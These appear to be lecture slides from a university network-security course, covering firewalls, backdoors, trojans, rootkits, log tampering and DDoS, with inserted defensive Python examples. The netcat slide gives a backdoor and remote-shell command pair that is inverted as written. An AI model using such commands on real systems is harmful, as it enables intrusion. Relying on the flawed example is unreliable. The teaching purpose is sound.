Summary From the Last Lecture
• Intrusions (vulnerability, exploit)
• Intrusion phases
• Reconnaissance (non-technical, technical)
  – Interrogating DNS, split-horizon DNS
• Scanning
  – Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities
  – NATs
  – Firewalls
• Gaining access
  – Buffer overflow attacks
  – Sniffing
  – ARP poisoning, DNS poisoning
  – Spoofing TCP sessions
Announcements
• Midterm in two weeks
• Midterm review next week
  – We will go over two sample midterms, posted on the class Web page
  – Bring any questions you may have
• Reading list posted on the class Web page
Firewall Types
• Packet (stateless) firewall
  – Rules speak about IP/TCP header fields
  – No connection state kept
  – E.g. drop all traffic with TCP SYN and src IP from the outside
• Stateful firewall
  – Connection state is kept
  – E.g. drop all traffic except TCP ACK on established TCP connections
• Proxy firewall
  – Acts as a middleman to every connection, i.e. acts as the destination and the source for every connection
  – Can normalize protocols, reset TTL fields, etc.
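As an added illustration (not code from the lecture), a toy Python model of the first two firewall types above, run over a constructed five-packet trace: the stateless rule drops only a bare SYN from outside, while the stateful filter also drops an outside ACK that matches no connection opened from inside. The 10.0.0.0/24 inside network and all addresses are assumptions; connection teardown is not modelled.

```python
from dataclasses import dataclass

INSIDE_PREFIX = "10.0.0."   # assumption: the protected network is 10.0.0.0/24

@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: frozenset        # TCP flags present, e.g. {"SYN"}, {"SYN", "ACK"}, {"ACK"}

def from_outside(pkt):
    return not pkt.src.startswith(INSIDE_PREFIX)

def stateless_filter(pkt):
    """Stateless rule on header fields only (the slide's example): drop a bare
    TCP SYN coming from outside; everything else passes, whether or not it
    belongs to a real connection."""
    if from_outside(pkt) and "SYN" in pkt.flags and "ACK" not in pkt.flags:
        return "drop"
    return "accept"

class StatefulFilter:
    """Keeps a connection table. Outside traffic is accepted only if it is an
    ACK on a connection that an inside host opened (the slide's example)."""
    def __init__(self):
        self.established = set()   # (inside_ip, inside_port, outside_ip, outside_port)

    def filter(self, pkt):
        if not from_outside(pkt):
            if "SYN" in pkt.flags:  # inside host opens a connection: remember it
                self.established.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "accept"
        key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.established and "ACK" in pkt.flags:
            return "accept"
        return "drop"

# Constructed trace: an inside client completes a handshake with a web server,
# then an outside host sends a SYN and a stray ACK that belong to no connection.
TRACE = [
    Packet("10.0.0.5", "203.0.113.7", 40000, 80, frozenset({"SYN"})),
    Packet("203.0.113.7", "10.0.0.5", 80, 40000, frozenset({"SYN", "ACK"})),
    Packet("10.0.0.5", "203.0.113.7", 40000, 80, frozenset({"ACK"})),
    Packet("198.51.100.9", "10.0.0.5", 4444, 22, frozenset({"SYN"})),
    Packet("198.51.100.9", "10.0.0.5", 4444, 22, frozenset({"ACK"})),
]

def run_stateless(trace=TRACE):
    return [stateless_filter(p) for p in trace]

def run_stateful(trace=TRACE):
    fw = StatefulFilter()   # fresh connection table per run
    return [fw.filter(p) for p in trace]

if __name__ == "__main__":
    for p, a, b in zip(TRACE, run_stateless(), run_stateful()):
        print(f"{p.src}:{p.sport} -> {p.dst}:{p.dport} {sorted(p.flags)} "
              f"stateless={a} stateful={b}")
```

The last packet is the one that separates the two designs: the stateless rule has no way to know that no inside host ever opened a connection to port 22 from 198.51.100.9:4444.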
Phase 4: Maintaining Access
• Attacker establishes a listening application on a port (backdoor) so he can log on any time with or without a password
• Attackers frequently close security holes they find to stop others from taking over their compromised machines
Netcat Tool
• Similar to Linux cat command
  – http://netcat.sourceforge.net/
  – Client: Initiates connection to any port on remote machine
  – Server: Listens on any port
  – To open a shell on a victim machine:
    On victim machine: nc -l -p 1234 /* This opens a backdoor */
    On attacker machine: nc 123.32.34.54 1234 -c /bin/sh /* This enters through a backdoor, opens a shell */
Dangerous
Netcat Tool
• Used for
  – Port scanning
  – Backdoor
  – Relaying the attack (stepping stones)
Trojans
• Application that claims to do one thing (and looks like it) but also does something malicious
• Users download Trojans from the Internet (thinking they are downloading a free game), or get them as greeting cards in e-mail, or as ActiveX controls when they visit a Web site
• Trojans can scramble your machine
  – They can also open a backdoor on your system, steal data, misuse your machine, etc.
• They will report successful infection to the attacker
Back Orifice
• Trojan application that can
  – Log keystrokes
  – Steal passwords
  – Create dialog boxes
  – Mess with files, processes or system (registry)
  – Redirect packets
  – Set up backdoors
  – Take over screen and keyboard
  – http://www.bo2k.com/
Dangerous
Trojan Defenses
• Antivirus software
• Don’t download suspicious software
• Check MD5 sum on trusted software you download
• Disable automatic execution of attachments
At the End of Maintaining Access
• The attacker has opened a backdoor and can now access the victim machine at any time
Phase 5: Covering Tracks
• Rootkits
• Alter logs
• Create hard-to-spot files
• Use covert channels
Application Rootkits
• Alter or replace system components (for instance DLLs)
• E.g., on Linux attacker replaces the ls program
• Rootkits frequently come together with sniffers:
  – Capture a few characters of all sessions on the Ethernet and write them into a file to steal passwords
  – Administrator would notice an interface in promiscuous mode
    • Not if attacker modifies an application that shows interfaces – netstat
Application Rootkits
• Attacker will modify all key system applications that could reveal his presence
  – List processes, e.g. ps
  – List files, e.g. ls
  – Show open ports, e.g. netstat
  – Show system utilization, e.g. top
• He will also substitute the modification date with one in the past
Defenses Against App. Rootkits
• Don’t let attackers gain root access
• Use integrity checking of files:
  – Carry a CD with md5sum, check hashes of system files against hashes advertised on vendor site or hashes you stored before
• Use Tripwire
  – Free integrity checker that saves md5 sums of all important files in a secure database (read-only CD), then verifies them periodically
  – http://www.tripwire.org/
Kernel Rootkits
• Replace system calls
  – Intercept calls to open one application with calls to open another, of attacker’s choosing
  – Now even checksums don’t help, as attacker did not modify any system applications
  – You won’t even see attacker’s files in file listing
  – You won’t see some processes or open ports
• Usually installed as kernel modules
• Defenses: disable kernel modules
Altering Logs
• Attackers can:
  – Stop logging services
  – Load files into memory, change them
  – Restart logging service
  – Or simply change log file through scripts
• Change login and event logs, command history file, last login data
Defenses Against Altering Logs
• Use separate log servers
  – Machines will send their log messages to these servers
• Encrypt log files
• Make log files append only
• Save logs on write-once media
Creating Hard-to-Spot Files
• Names could look like system file names, but slightly changed
  – Start with .
  – Start with . and add spaces
  – Make files hidden
• Defenses: intrusion detection systems and caution
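An added Python detector (not from the lecture) for the naming tricks listed above, run over a constructed directory listing. The set of system names it compares against is an assumption, and it goes a step beyond the slide by also catching near-misspellings of those names and invisible (zero-width) characters inside a name.

```python
import unicodedata

# Assumption: names of system programs an intruder might imitate.
KNOWN_SYSTEM_NAMES = {"ls", "ps", "netstat", "top", "sshd", "crond", "syslogd"}

def within_one_edit(a, b):
    """True if a becomes b with at most one insertion, deletion or substitution."""
    if a == b:
        return True
    if abs(len(a) - len(b)) > 1:
        return False
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i += 1
            j += 1
            continue
        edits += 1
        if edits > 1:
            return False
        if len(a) > len(b):
            i += 1            # deletion from a
        elif len(a) < len(b):
            j += 1            # insertion into a
        else:
            i += 1            # substitution
            j += 1
    return edits + (len(a) - i) + (len(b) - j) <= 1

def suspicious_reasons(name):
    """Reasons a file name looks like one of the hiding tricks on the slide."""
    reasons = []
    if name.startswith(".") and name.strip(". \t") == "":
        reasons.append("name is only dots and whitespace")
    elif name.startswith(".") and name[1:] != name[1:].lstrip():
        reasons.append("dot followed by whitespace")
    elif name != name.strip():
        reasons.append("leading or trailing whitespace")
    if any(unicodedata.category(c).startswith("C") for c in name):
        reasons.append("invisible control or format character")
    base = name.lstrip(".").strip().lower()
    if base in KNOWN_SYSTEM_NAMES and name.lower() != base:
        reasons.append(f"system name '{base}' disguised with dots or whitespace")
    elif base and base not in KNOWN_SYSTEM_NAMES:
        for sysname in sorted(KNOWN_SYSTEM_NAMES):
            if within_one_edit(base, sysname):
                reasons.append(f"imitates system name '{sysname}'")
                break
    return reasons

# Constructed directory listing; a real scan would use os.listdir() on /bin, /tmp, etc.
CONSTRUCTED_LISTING = [
    "ls", "netstat", ".bashrc", "report.txt",          # benign
    ". ", "..  ", "...", ".  sshd", "1s", "netsat",    # the slide's tricks
    "cron\u200bd",                                     # zero-width space inside the name
]

def scan(names=CONSTRUCTED_LISTING):
    """Return only the names that triggered at least one reason."""
    flagged = {}
    for n in names:
        reasons = suspicious_reasons(n)
        if reasons:
            flagged[n] = reasons
    return flagged

if __name__ == "__main__":
    for n, why in scan().items():
        print(repr(n), "->", "; ".join(why))
```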
Denial of Service
Distributed Denial Of Service?
Denial of Service Attacks
• Unlike other forms of computer attacks, goal isn’t access or theft of information or services
• The goal is to stop the service from operating
  – To deny service to legitimate users
  – Slowing down may be good enough
• This is usually a temporary effect that passes as soon as the attack stops
How Can a Service Be Denied?
• Lots of ways
  – Crash the machine
  – Or put it into an infinite loop
  – Crash routers on the path to the machine
  – Use up a key machine resource
  – Use up a key network resource
  – Deny another service needed for this one (DNS)
• Using up resources is the most common approach
High-level Attack Categorization
• Floods
• Congestion control exploits
• Unexpected header values
• Invalid content
• Invalid fragments
• Large packets
• Impersonation attacks
Simple Denial of Service
Simple Denial of Service
• One machine tries to bring down another machine
• There is a fundamental problem for the attacker:
  – The attack machine must be “more powerful” than the target machine to overload it, OR
  – Attacker uses approaches other than flooding
• The target machine might be a powerful server
Denial of Service and Asymmetry
• Sometimes generating a request is cheaper than formulating a response, e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus
• If so, one attack machine can generate a lot of requests, and effectively multiply its power
• Not always possible to achieve this asymmetry
• This is called the amplification effect
DDoS “Solves” That Problem
• Use multiple machines to generate the workload
• For any server of fixed power, enough attack machines working together can overload it
• Enlist lots of machines and coordinate their attack on a single machine
Distributed Computing
Typical Attack Modus Operandi
Is DDoS a Real Problem?
• Yes, attacks happen every day
  – One study reported ~4,000 per week [1]
• On a wide variety of targets
• Tend to be highly successful
• There are very few mechanisms that can stop certain attacks
• There have been successful attacks on major commercial sites

[1] “Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, USENIX Security Symposium, 2002
DDoS on Twitter
• August 2009, hours-long service outage
  – 44 million users affected
• At the same time Facebook, LiveJournal, YouTube and Blogger were under attack
  – Only some users experienced an outage
• Real target: a Georgian blogger
[Image borrowed from Wired.com article; originally provided by Arbor Networks]
DDoS on Mastercard and Visa
• December 2010
• Parts of services went down briefly
• Attack launched by a group of vigilantes called Anonymous
  – Bots recruited through social engineering
  – Directed to download DDoS software and take instructions from a master
  – Motivation: payback to services that cut their support of WikiLeaks after its founder was arrested on unrelated charges
• Several other services affected
Potential Effects of DDoS Attacks
• Most (if not all) sites could be rendered non-operational
• The Internet could be largely flooded with garbage traffic
• Essentially, the Internet could grind to a halt
  – In the face of a very large attack
• Almost any site could be put out of business
  – With a moderate-sized attack
Who Is Vulnerable?
• Everyone connected to the Internet can be attacked
• Everyone who uses the Internet for crucial operations can suffer damages
But My Machines Are Well Secured!
Doesn’t matter! The problem isn’t your vulnerability, it’s everyone else’s.
But I Have a Firewall!
Doesn’t matter! Either the attacker slips his traffic into legitimate traffic, or he attacks the firewall.
But I Use a VPN!
Doesn’t matter! The attacker can fill your tunnel with garbage. Sure, you’ll detect it and discard it . . . but you’ll be so busy doing so that you’ll have no time for your real work.
But I’m Heavily Provisioned
Doesn’t matter!
The attacker can probably get enough resources to overcome any level of resources you buy
Attack Toolkits
• Widely available on the net
  – Easily downloaded along with source code
  – Easily deployed and used
• Automated code for:
  – Scanning – detection of vulnerable machines
  – Exploit – breaking into the machine
  – Infection – placing the attack code
• Rootkits
  – Hide the attack code
  – Restart the attack code
  – Keep open backdoors for attacker access
• DDoS attack code
DDoS Attack Code
• Attacker can customize:
  – Type of attack
    • UDP flood, ICMP flood, TCP SYN flood, Smurf attack (broadcast ping flood)
    • Web server request flood, authentication request flood, DNS flood
  – Victim IP address
  – Duration
  – Packet size
  – Source IP spoofing
  – Dynamics (constant rate or pulsing)
  – Communication between master and slaves
Implications Of Attack Toolkits
• You don’t need much knowledge or great skills to perpetrate DDoS
• Toolkits allow unsophisticated users to become DDoS perpetrators in little time
• DDoS is, unfortunately, a game anyone can play
DDoS Attack Trends
• Attackers follow defense approaches, adjust their code to bypass defenses
• Use of subnet spoofing defeats ingress filtering
• Use of encryption and decoy packets, IRC or P2P obscures master-slave communication
• Encryption of attack packets defeats traffic analysis and signature detection
• Pulsing attacks defeat slow defenses and traceback
• Flash-crowd attacks generate legitimate (well-formed) application traffic
Implications For the Future
• If we solve simple attacks, DDoS perpetrators will move on to more complex attacks
• Recently seen trends:
  – Larger networks of attack machines
  – Rolling attacks from large number of machines
  – Attacks at higher semantic levels
  – Attacks on different types of network entities
  – Attacks on DDoS defense mechanisms
• Need flexible defenses that evolve with attacks
How Come We Have DDoS?
• Natural consequence of the way the Internet is organized
  – Best-effort service means routers don’t do much processing per packet and store no state – they will let anything through
  – End-to-end paradigm means routers will enforce no security or authentication – they will let anything through
• It works really well when both parties play fair
• It creates opportunity for DDoS when one party cheats
There Are Still No Strong Defenses Against DDoS
• You can make yourself harder to attack
• But you can’t make it impossible
• And, if you haven’t made it hard enough, there’s not much you can do when you are attacked
  – There are no patches to apply
  – There is no switch to turn
  – There might be no filtering rule to apply
  – Grin and bear it